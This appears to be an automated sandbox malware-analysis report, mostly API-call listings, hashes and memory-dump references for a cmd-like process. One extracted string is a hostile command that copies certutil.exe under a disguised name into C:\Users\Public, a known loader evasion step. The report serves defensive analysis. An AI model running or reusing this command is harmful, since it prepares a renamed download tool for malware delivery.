                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF706EDC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2242554020-619615743
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f45b04878c373140482bd9bf728b90acdb964024760a201dc50eba82409da46
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4127E65A1875281EA20BB14AC2417BA3A4FF44FE4FE85235DA6E437E4DF3CE546C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EC7013
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EC7123
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC706E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00007FF706EC70A5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 00007FF706ECF9DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA00
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA5F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: FindFirstFileExW.KERNELBASE ref: 00007FF706EC8280
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC829D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706EDEAC5,?,?,?,00007FF706EDE925,?,?,?,?,00007FF706EBB9B1), ref: 00007FF706EC3A56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706ECFA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3db15ab557e2e3ffb4c97bc6f2d5bc8e4c2b62e3e7f52a40e25e558ef806ecb4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251B932A08B8286EF60AF24DC202BAF7A1FF85B64F854535DA0E47794DF3CD5468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB54DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706EB552B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706EB554F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED345F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED347E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED34C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706ED34DB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF706EB1F7D), ref: 00007FF706ED34FA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: _get_osfhandle.MSVCRT ref: 00007FF706EC3715
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC3770
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3791
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1356649289-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$/-.$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1644023181-879152773
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706ED7251), ref: 00007FF706ED628E
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3377411628-1881496484
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC25CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC25E8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC260F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC2636
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC2650
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2516562204-381716982
APIs
  • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
  • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
  • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
  • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
  • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
  • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
• iswspace.MSVCRT ref: 00007FF706EC7EEE
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: A
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 689241570-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2941894976-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0148
                                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 734197835-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd7774f3eeb1bb8051a583f669882c09c209f2df1e8e0a3a2d05f538a7c0d902
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71A1A421A0874292EA11AB55DC602BBE3A0FF85B94FD84631DB4E077D6DF7DE941C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 243296809-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60be762bc2f238b34bdb0c88eec8624aee1e9c873850d371e085b00f3290e1ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
